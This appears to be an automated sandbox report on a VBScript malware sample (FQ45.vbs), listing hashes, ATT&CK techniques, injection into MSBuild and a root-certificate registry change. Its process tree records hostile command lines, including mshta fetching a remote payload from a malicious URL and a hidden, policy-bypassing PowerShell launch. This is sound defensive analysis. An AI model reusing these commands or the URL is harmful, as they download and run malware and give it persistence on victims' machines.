e5ddae23eb8d248fb190371808ab28d20485a16f2eb0fc238a1fb812f3c52c91

Analysis

max time kernel
63s
max time network
130s
platform
windows10_x64
resource
win10v20201028
submitted
08-04-2021 06:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FQ45.vbs
Size

996B
MD5

7c5cdd80461494fe18eae20726676f01
SHA1

9d4ba6a01448c36043854f6a13a5922480c6a26f
SHA256

e5ddae23eb8d248fb190371808ab28d20485a16f2eb0fc238a1fb812f3c52c91
SHA512

9c54062fd3cc99467613562bac1dc29b477492c3ce8b07a1c289c1c4099a036ddcd00c5a0992244d17afda0ee9cb4d308a022c7d4993e64423a46470af64e93c

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

10 2892 mshta.exe
12 2892 mshta.exe
14 2892 mshta.exe
17 588 powershell.exe

flow	pid	process
10	2892	mshta.exe
12	2892	mshta.exe
14	2892	mshta.exe
17	588	powershell.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FQ45.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FQ45.vbs	WScript.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

25 ip-api.com

flow	ioc
25	ip-api.com

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 588 set thread context of 4048	588	powershell.exe	MSBuild.exe
PID 588 set thread context of 3248	588	powershell.exe	MSBuild.exe
PID 588 set thread context of 204	588	powershell.exe	MSBuild.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 2 IoCs

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exedw20.exe

pid	process
1100	powershell.exe
1100	powershell.exe
1100	powershell.exe
2700	powershell.exe
2700	powershell.exe
2700	powershell.exe
588	powershell.exe
588	powershell.exe
588	powershell.exe
392	dw20.exe
392	dw20.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exedw20.exeMSBuild.exe

description	pid	process
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	588	powershell.exe
Token: SeRestorePrivilege	392	dw20.exe
Token: SeBackupPrivilege	392	dw20.exe
Token: SeDebugPrivilege	4048	MSBuild.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MSBuild.exe

pid process

4048 MSBuild.exe

pid	process
4048	MSBuild.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

WScript.exepowershell.exemshta.exepowershell.exeMSBuild.exe

description	pid	process	target process
PID 4020 wrote to memory of 1100	4020	WScript.exe	powershell.exe
PID 4020 wrote to memory of 1100	4020	WScript.exe	powershell.exe
PID 1100 wrote to memory of 2892	1100	powershell.exe	mshta.exe
PID 1100 wrote to memory of 2892	1100	powershell.exe	mshta.exe
PID 2892 wrote to memory of 2700	2892	mshta.exe	powershell.exe
PID 2892 wrote to memory of 2700	2892	mshta.exe	powershell.exe
PID 4020 wrote to memory of 588	4020	WScript.exe	powershell.exe
PID 4020 wrote to memory of 588	4020	WScript.exe	powershell.exe
PID 588 wrote to memory of 4048	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 4048	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 4048	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 4048	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 4048	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 4048	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 4048	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 4048	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 3248	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 3248	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 3248	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 3248	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 3248	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 3248	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 3248	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 3248	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 204	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 204	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 204	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 204	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 204	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 204	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 204	588	powershell.exe	MSBuild.exe
PID 588 wrote to memory of 204	588	powershell.exe	MSBuild.exe
PID 3248 wrote to memory of 392	3248	MSBuild.exe	dw20.exe
PID 3248 wrote to memory of 392	3248	MSBuild.exe	dw20.exe
PID 3248 wrote to memory of 392	3248	MSBuild.exe	dw20.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FQ45.vbs"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\mshta https://pazpus.com/bootstrap/cache/zender.txt
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://pazpus.com/bootstrap/cache/zender.txt
3⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:588

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4048

C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:3248

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 708
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:392

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
PID:204

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
2143b379fed61ab5450bab1a751798ce

SHA1
32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

SHA256
a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

SHA512
0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

Download Submit
C:\Users\Public\Datax.ps1
MD5
1528b8b5cf18ecec9301b85857229cee

SHA1
33e9a4e6708165c16aa504a78d12e06b5a114732

SHA256
2a8bfceffcf3160eac54e71049566c7dfa2dc0651301b4dfe1c0d247d7ba875c

SHA512
4f9b247f87ae844418cf3c210e88b9c745a0ae1249221ce6177be40f92cc23e7a64d29bc6666d942203d8fffefd41a6d62a2ad39cd69bf4a14a8228cd1892d7e

Download Submit
memory/204-55-0x0000000003060000-0x0000000003061000-memory.dmp

Filesize
4KB

Download
memory/204-44-0x0000000005980000-0x0000000005981000-memory.dmp

Filesize
4KB

Download
memory/204-36-0x0000000073D40000-0x000000007442E000-memory.dmp

Filesize
6.9MB

Download
memory/204-35-0x00000000004581DE-mapping.dmp

Download
memory/392-54-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-63-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-75-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-57-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-91-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-58-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-90-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-77-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-81-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-74-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-72-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-89-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-70-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-71-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-69-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-68-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-84-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-88-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-87-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-65-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-86-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-85-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-67-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-41-0x0000000000000000-mapping.dmp

Download
memory/392-66-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-46-0x0000000002670000-0x0000000002671000-memory.dmp

Filesize
4KB

Download
memory/392-83-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-49-0x0000000002A60000-0x0000000002A61000-memory.dmp

Filesize
4KB

Download
memory/392-50-0x00000000008C0000-0x00000000008C1000-memory.dmp

Filesize
4KB

Download
memory/392-82-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-64-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-78-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-56-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-53-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-73-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-59-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-80-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-60-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-62-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/392-61-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/588-22-0x00000262B1053000-0x00000262B1055000-memory.dmp

Filesize
8KB

Download
memory/588-26-0x00000262B1056000-0x00000262B1058000-memory.dmp

Filesize
8KB

Download
memory/588-18-0x0000000000000000-mapping.dmp

Download
memory/588-19-0x00007FFE02F20000-0x00007FFE0390C000-memory.dmp

Filesize
9.9MB

Download
memory/588-21-0x00000262B1050000-0x00000262B1052000-memory.dmp

Filesize
8KB

Download
memory/588-29-0x00000262B1520000-0x00000262B1528000-memory.dmp

Filesize
32KB

Download
memory/588-28-0x00000262B1510000-0x00000262B151A000-memory.dmp

Filesize
40KB

Download
memory/1100-3-0x00007FFE081C0000-0x00007FFE08BAC000-memory.dmp

Filesize
9.9MB

Download
memory/1100-6-0x0000019BD07F0000-0x0000019BD07F1000-memory.dmp

Filesize
4KB

Download
memory/1100-2-0x0000000000000000-mapping.dmp

Download
memory/1100-7-0x0000019BEB1A0000-0x0000019BEB1A1000-memory.dmp

Filesize
4KB

Download
memory/1100-5-0x0000019BE8CD3000-0x0000019BE8CD5000-memory.dmp

Filesize
8KB

Download
memory/1100-4-0x0000019BE8CD0000-0x0000019BE8CD2000-memory.dmp

Filesize
8KB

Download
memory/1100-9-0x0000019BE8CD6000-0x0000019BE8CD8000-memory.dmp

Filesize
8KB

Download
memory/2700-15-0x0000022143B03000-0x0000022143B05000-memory.dmp

Filesize
8KB

Download
memory/2700-10-0x0000000000000000-mapping.dmp

Download
memory/2700-12-0x00007FFE02F20000-0x00007FFE0390C000-memory.dmp

Filesize
9.9MB

Download
memory/2700-14-0x0000022143B00000-0x0000022143B02000-memory.dmp

Filesize
8KB

Download
memory/2700-16-0x0000022143C10000-0x0000022143C11000-memory.dmp

Filesize
4KB

Download
memory/2892-8-0x0000000000000000-mapping.dmp

Download
memory/3248-33-0x00000000004581DE-mapping.dmp

Download
memory/3248-38-0x0000000002E90000-0x0000000002E91000-memory.dmp

Filesize
4KB

Download
memory/4048-47-0x00000000053B0000-0x00000000053B1000-memory.dmp

Filesize
4KB

Download
memory/4048-31-0x00000000004581DE-mapping.dmp

Download
memory/4048-30-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/4048-37-0x0000000073D40000-0x000000007442E000-memory.dmp

Filesize
6.9MB

Download
memory/4048-76-0x0000000005560000-0x0000000005561000-memory.dmp

Filesize
4KB

Download
memory/4048-52-0x0000000005450000-0x0000000005451000-memory.dmp

Filesize
4KB

Download
memory/4048-94-0x00000000060F0000-0x00000000060F1000-memory.dmp

Filesize
4KB

Download
memory/4048-95-0x00000000064E0000-0x00000000064E1000-memory.dmp

Filesize
4KB

Download
memory/4048-96-0x0000000006860000-0x0000000006861000-memory.dmp

Filesize
4KB

Download